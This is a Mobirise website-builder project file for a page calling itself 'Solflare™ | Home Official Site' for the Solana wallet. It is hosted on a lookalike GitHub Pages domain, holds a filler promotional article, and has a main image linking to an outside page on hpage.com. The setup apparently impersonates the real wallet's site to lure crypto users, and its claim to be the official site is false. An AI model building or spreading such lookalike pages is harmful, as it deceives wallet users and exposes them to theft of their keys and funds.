{
  "settings": {
    "name": "Site 2023-12-21 10:48",
    "currentPage": "index.html",
    "theme": {
      "name": "startm5",
      "title": "StartM5",
      "titlePreset": "StartM5",
      "styling": {
        "primaryColor": "#9fe870",
        "secondaryColor": "#ffd7ef",
        "successColor": "#3a341c",
        "infoColor": "#320707",
        "warningColor": "#a0e2e1",
        "dangerColor": "#ffea64",
        "mainFont": "Inter Tight",
        "display1Font": "Inter Tight",
        "display1Size": 5,
        "display2Font": "Inter Tight",
        "display2Size": 4,
        "display5Font": "Inter Tight",
        "display5Size": 2,
        "display7Font": "Inter Tight",
        "display7Size": 1.4,
        "display4Font": "Inter Tight",
        "display4Size": 1.4,
        "isRoundedImages": true,
        "isRoundedButtons": true,
        "isLargeButtons": true,
        "isGhostButtonBorder": true,
        "underlinedLinks": false,
        "isAnimatedOnScroll": false,
        "isScrollToTopButton": false
      }
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "5.9.8",
    "siteFonts": [],
    "robotsSwitcher": true,
    "robotsText": "User-agent: *\nDisallow: /cgi-bin\nSitemap: https://solflare-com.github.io/sitemap.xml",
    "sitemapSwitcher": true,
    "siteUrl": "https://solflare-com.github.io/",
    "sitemapSwitcherAuto": "on",
    "imageResize": true,
    "usedWebp": true,
    "favicon": false,
    "mbrsiteDomain": "2oo9zmafbu",
    "cookiesAlert": false,
    "gdpr": false,
    "uniqCompNum": 2,
    "versionPublish": "5.9.8"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Solflare™ | Home Official Site",
        "meta_descr": "Solflare is the safest way to start exploring Solana. Buy, store, swap tokens & NFTs and access Solana DeFi from web or mobile. Download ...",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "alias": false,
          "_styles": {
            "background-color": "@bgColor",
            "padding-top": "(@paddingTop * 15px)",
            "padding-bottom": "(@paddingBottom * 15px)",
            "img": {
              "object-fit": "contain",
              "border-radius": "0 !important"
            }
          },
          "_name": "image04",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"image03\" group=\"Image & Video\">\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Caption\" name=\"showText\">\n        <header>Background</header>\n        <input type=\"color\" title=\"Color\" name=\"bgColor\" value=\"#ffffff\">\n    </mbr-parameters>\n\n    <div class=\"image-block m-auto\">\n        <a href=\"https://solflare.hpage.com/\"><img src=\"@PROJECT_PATH@/assets/images/solflare.png\" alt=\"Solflare\"></a>\n        <div mbr-if=\"showText\">\n            <p class=\"mbr-text mt-4 pb-4 align-center mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".mbr-text\">\n                Unlock your true path!\n            </p>\n        </div>\n    </div>\n</section>",
          "_cid": "tZ32Qz99hC",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {},
          "_anchor": "image04-0"
        },
        {
          "alias": false,
          "_styles": {
            "& when not (@fullScreen)": {
              "padding-top": "(@paddingTop * 1rem)",
              "padding-bottom": "(@paddingBottom * 1rem)"
            },
            "& when (@bg-type = \"color\")": {
              "background-color": "@bg-value"
            },
            "& when (@bg-type = \"image\")": {
              "background-image": "url(@bg-value)"
            },
            ".mbr-fallback-image.disabled": {
              "display": "none"
            },
            ".mbr-fallback-image": {
              "display": "block",
              "background-size": "cover",
              "background-position": "center center",
              "width": "100%",
              "height": "100%",
              "position": "absolute",
              "top": "0",
              "& when (@bg-type = 'video')": {
                "background-image": "url(@fallBackImage)"
              }
            },
            ".card-wrapper": {
              "background": "@wrapBgColor",
              "@media (max-width: 767px)": {
                "padding": "2rem 1.5rem"
              },
              "@media (min-width: 768px) and (max-width: 991px)": {
                "padding": "2.25rem"
              },
              "@media (min-width: 992px)": {
                "padding": "4rem"
              }
            },
            ".mbr-text, .mbr-section-btn": {
              "color": "#000000",
              "text-align": "left"
            },
            ".card-title, .card-box": {
              "text-align": "left",
              "color": "#000000"
            }
          },
          "_name": "article07",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"article07\" group=\"Article\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" mbr-class=\"{\n    'mbr-fullscreen': fullScreen,\n    'mbr-parallax-background': bg.parallax}\">\n  <mbr-parameters>\n    <header>Size</header>\n    <input type=\"checkbox\" title=\"Full Screen\" name=\"fullScreen\">\n    <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n    <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"5\">\n    <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"5\">\n    <input type=\"range\" inline title=\"Content Width\" name=\"contentWidth\" min=\"8\" max=\"12\" step=\"1\" value=\"10\">\n    <header>Show/Hide</header>\n    <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n    <input type=\"checkbox\" title=\"Subtitle\" name=\"showSubtitle\" checked>\n    <input type=\"checkbox\" title=\"Text\" name=\"showText\" checked>\n    <input type=\"checkbox\" title=\"Buttons\" name=\"showButtons\">\n    <input type=\"color\" title=\"Wrap Bg\" name=\"wrapBgColor\" value=\"#ffffff\">\n    <header>Background</header>\n    <fieldset type=\"background\" name=\"bg\" parallax>\n      <input type=\"image\" title=\"Image\" value=\"../_images/background1.jpg\" parallax>\n      <input type=\"color\" title=\"Color\" value=\"#edefeb\" selected>\n      <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n    </fieldset>\n    <header condition=\"bg.type === 'video'\">Fallback Image</header>\n    <input type=\"image\" title=\"Fallback Image\" value=\"../_images/background1.jpg\" name=\"fallBackImage\" condition=\"bg.type === 'video'\">\n    <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n    <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n    <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.3\" condition=\"overlay && bg.type !== 'color'\">\n  </mbr-parameters>\n\n  <div class=\"mbr-fallback-image disabled\" mbr-if=\"bg.type == 'video'\"></div>\n  <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type!== 'color'\" mbr-style=\"{'opacity': overlayOpacity, 'background-color': overlayColor}\"></div>\n  <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n    <div class=\"row justify-content-center\">\n      <div class=\"card col-md-12 col-lg-{{contentWidth}}\">\n        <div class=\"card-wrapper\">\n          <h3 class=\"card-title mbr-fonts-style mbr-white mt-3 mb-4\" mbr-theme-style=\"display-2\" mbr-if=\"showTitle\" data-app-selector=\".card-title, .card-box\"><b><a href=\"https://solflare-com.github.io/\" class=\"text-primary\">Solflare</a> Wallet™ | Home Official Site</b></h3>\n          <div class=\"row card-box align-left\">\n            \n            \n            \n            <div class=\"item features-without-image col-12 active\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><a href=\"https://solflare.com/\" class=\"text-primary\">Solflare Wallet</a></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">In the fast-paced world of blockchain and decentralized finance (DeFi), the Solflare Wallet emerges as a powerful tool for users navigating the Solana blockchain. As blockchain technology continues to evolve, Solflare stands out with its robust features, user-friendly interface, and seamless integration with the Solana ecosystem. This article delves into the key aspects of the Solflare Wallet, exploring its features, advantages, and the impact it has on users engaging with the Solana blockchain.\n<br>\n<br>Understanding Solflare Wallet:\n<br>\n<br>Solflare Wallet is a non-custodial cryptocurrency wallet specifically designed for the Solana blockchain. It serves as a secure and user-friendly interface for managing digital assets, interacting with decentralized applications (DApps), and participating in the broader Solana ecosystem. The wallet empowers users by providing them with full control over their assets while ensuring a smooth and efficient experience.\n<br>\n<br>Key Features:\n<br>\n<br>Non-Custodial Nature:\n<br>Solflare Wallet adheres to the principles of decentralization, emphasizing the non-custodial nature of the platform. This means that users retain ownership of their private keys, ensuring that they have complete control and custody over their digital assets. The wallet acts as a secure gateway, facilitating user interaction with the blockchain without compromising security.\n<br>\n<br>User-Friendly Interface:\n<br>One of Solflare Wallet's standout features is its intuitive and user-friendly interface. Whether for newcomers or experienced crypto enthusiasts, the wallet's design simplifies the user experience, making it accessible and easy to navigate. The clean layout and straightforward design contribute to a positive onboarding process for users entering the Solana ecosystem.\n<br>\n<br>Solana Ecosystem Integration:\n<br>Solflare Wallet seamlessly integrates with the Solana blockchain, providing users with direct access to the diverse range of decentralized applications within the ecosystem. From decentralized exchanges and yield farming platforms to NFT marketplaces, Solflare acts as a central hub for users to engage with various applications without the need for multiple wallets.\n<br>\n<br>Security Measures:\n<br>Security is paramount in the cryptocurrency space, and Solflare Wallet prioritizes the protection of user assets. The implementation of robust security measures, including encryption of private keys and multi-factor authentication, ensures that users can transact and manage their assets with confidence.\n<br>\n<br>Advantages of Solflare Wallet:\n<br>\n<br>Low Transaction Costs:\n<br>Solana is renowned for its high throughput and low transaction costs. Solflare Wallet leverages these features, allowing users to benefit from fast transaction speeds and cost-effective interactions with the blockchain. This advantage makes Solflare a preferred choice for users engaged in frequent transactions.\n<br>\n<br>Fast Transaction Speeds:\n<br>The Solana blockchain's efficiency translates into rapid transaction speeds, and Solflare Wallet harnesses this capability to provide users with near-instantaneous confirmations. The elimination of delays commonly associated with some other blockchain networks enhances the overall user experience.\n<br>\n<br>Community Engagement:\n<br>Solflare Wallet has fostered an active and engaged community. The community plays a crucial role in providing support, sharing insights, and contributing to the ongoing development of the wallet. This collaborative environment not only strengthens Solflare's user base but also enhances the overall Solana ecosystem.\n<br>\n<br>Cross-Platform Accessibility:\n<br>Solflare Wallet ensures accessibility across various devices and platforms. Whether users prefer managing their assets on desktops, laptops, or mobile devices, the wallet's cross-platform compatibility enables a seamless and consistent experience, enhancing the flexibility of users to interact with their digital assets.\n<br>\n<br>The Impact of Solflare Wallet on the Solana Ecosystem:\n<br>\n<br>Facilitating Mass Adoption:\n<br>Solflare Wallet's user-friendly interface, combined with the advantages of the Solana blockchain, contributes to the broader goal of mass adoption. As more users seek efficient and accessible ways to engage with blockchain technology, Solflare plays a pivotal role in simplifying the onboarding process.\n<br>\n<br>Empowering Users in DeFi:\n<br>Solflare Wallet serves as a gateway for users to explore the decentralized finance landscape on the Solana blockchain. The wallet's integration with various DeFi applications empowers users to participate in activities such as liquidity provision, yield farming, and decentralized trading, all within a secure and user-friendly environment.\n<br>\n<br>Building Confidence in Solana:\n<br>The success and adoption of Solflare Wallet contribute to building confidence in the Solana blockchain. As users experience the efficiency, low costs, and security features offered by both Solana and Solflare, the overall perception of the Solana ecosystem is positively influenced.\n<br>\n<br>Paving the Way for Future Wallets:\n<br>Solflare Wallet, with its emphasis on user experience, security, and ecosystem integration, serves as a model for the development of future cryptocurrency wallets. Its success highlights the importance of creating platforms that not only provide secure storage but also serve as a gateway for users to explore and engage with the broader blockchain ecosystem.\n<br>\n<br>Conclusion:\n<br>\n<br>In the dynamic world of blockchain and decentralized finance, the Solflare Wallet emerges as a crucial tool for users navigating the Solana ecosystem. With its non-custodial nature, user-friendly interface, and seamless integration with the Solana blockchain, Solflare empowers users to take control of their digital assets and participate in the evolving landscape of decentralized applications. As the Solana ecosystem continues to expand, Solflare Wallet remains at the forefront, contributing to the growth, adoption, and positive perception of the Solana blockchain.</p>\n              </div>\n            </div>\n          </div>\n          <div mbr-buttons mbr-theme-style=\"display-7\" class=\"mbr-section-btn\" mbr-if=\"showButtons\" data-toolbar=\"-mbrBtnMove\">\n            <a class=\"btn btn-primary\" href=\"https://mobiri.se\" data-app-placeholder=\"Type Text\">Start Now</a>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</section>",
          "_cid": "tZ32Rttntk",
          "_anchor": "article07-1",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        }
      ]
    }
  }
}